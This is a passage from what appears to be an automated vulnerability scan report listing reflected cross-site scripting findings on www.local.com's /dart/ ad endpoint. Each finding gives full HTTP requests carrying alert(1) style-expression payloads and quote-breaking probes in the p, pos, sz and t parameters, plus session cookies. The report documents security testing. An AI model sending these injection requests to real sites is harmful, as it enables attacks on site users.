Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 888
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:28 GMT
Connection: close
Content-Length: 888


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300;ord=129674888274880630';c205c1fb2ef?" type="text/javascript">
...[SNIP]...

4.462. http://www.local.com/dart/ [p parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 142ef'%3b04d7f2c0dea was submitted in the p parameter. This input was echoed as 142ef';04d7f2c0dea in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dart/?ag=True&p=locm.pp142ef'%3b04d7f2c0dea&sz=350x300&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 888
Date: Thu, 03 Feb 2011 16:02:24 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 888


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/locm.pp142ef';04d7f2c0dea;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300;ord=1296748882748?" type="text/javascript">
...[SNIP]...

4.463. http://www.local.com/dart/ [p parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the p request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4a96"style%3d"x%3aexpression(alert(1))"957bd801f83 was submitted in the p parameter. This input was echoed as f4a96"style="x:expression(alert(1))"957bd801f83 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /dart/?ag=True&p=locm.ppf4a96"style%3d"x%3aexpression(alert(1))"957bd801f83&sz=350x300&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 975
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:24 GMT
Connection: close
Content-Length: 975


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/locm.ppf4a96"style="x:expression(alert(1))"957bd801f83;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300;ord=1296748882748?" target="_blank">
...[SNIP]...

4.464. http://www.local.com/dart/ [pos parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 795a7'%3b1996a89d919 was submitted in the pos parameter. This input was echoed as 795a7';1996a89d919 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dart/?ag=True&p=locm.pp&pos=8795a7'%3b1996a89d919&t=8&sz=310x101&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 894
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:33 GMT
Connection: close
Content-Length: 894


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/locm.pp;dcopt=ist;kw=banks;pos=8795a7';1996a89d919;tile=8;city=dallas_tx;sz=310x101;ord=1296748882748?" type="text/javascript">
...[SNIP]...

4.465. http://www.local.com/dart/ [pos parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the pos request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a068"style%3d"x%3aexpression(alert(1))"c701155616e was submitted in the pos parameter. This input was echoed as 6a068"style="x:expression(alert(1))"c701155616e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /dart/?ag=True&p=locm.pp&pos=86a068"style%3d"x%3aexpression(alert(1))"c701155616e&t=8&sz=310x101&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 981
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:33 GMT
Connection: close
Content-Length: 981


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=86a068"style="x:expression(alert(1))"c701155616e;tile=8;city=dallas_tx;sz=310x101;ord=1296748882748?" target="_blank">
...[SNIP]...

4.466. http://www.local.com/dart/ [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the sz request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d243c"style%3d"x%3aexpression(alert(1))"d187ae2a24b was submitted in the sz parameter. This input was echoed as d243c"style="x:expression(alert(1))"d187ae2a24b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /dart/?ag=True&p=locm.pp&sz=350x300d243c"style%3d"x%3aexpression(alert(1))"d187ae2a24b&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 975
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:26 GMT
Connection: close
Content-Length: 975


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300d243c"style="x:expression(alert(1))"d187ae2a24b;ord=1296748882748?" target="_blank">
...[SNIP]...

4.467. http://www.local.com/dart/ [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9fc55'%3b14f61c68560 was submitted in the sz parameter. This input was echoed as 9fc55';14f61c68560 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dart/?ag=True&p=locm.pp&sz=350x3009fc55'%3b14f61c68560&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 888
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:26 GMT
Connection: close
Content-Length: 888


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x3009fc55';14f61c68560;ord=1296748882748?" type="text/javascript">
...[SNIP]...

4.468. http://www.local.com/dart/ [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58aaf'%3bb65e854cbc0 was submitted in the t parameter. This input was echoed as 58aaf';b65e854cbc0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dart/?ag=True&p=locm.pp&pos=8&t=858aaf'%3bb65e854cbc0&sz=310x101&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 894
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:35 GMT
Connection: close
Content-Length: 894


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/locm.pp;dcopt=ist;kw=banks;pos=8;tile=858aaf';b65e854cbc0;city=dallas_tx;sz=310x101;ord=1296748882748?" type="text/javascript">
...[SNIP]...

4.469. http://www.local.com/dart/ [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the t request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf3d9"style%3d"x%3aexpression(alert(1))"9c6370ca462 was submitted in the t parameter. This input was echoed as cf3d9"style="x:expression(alert(1))"9c6370ca462 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /dart/?ag=True&p=locm.pp&pos=8&t=8cf3d9"style%3d"x%3aexpression(alert(1))"9c6370ca462&sz=310x101&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
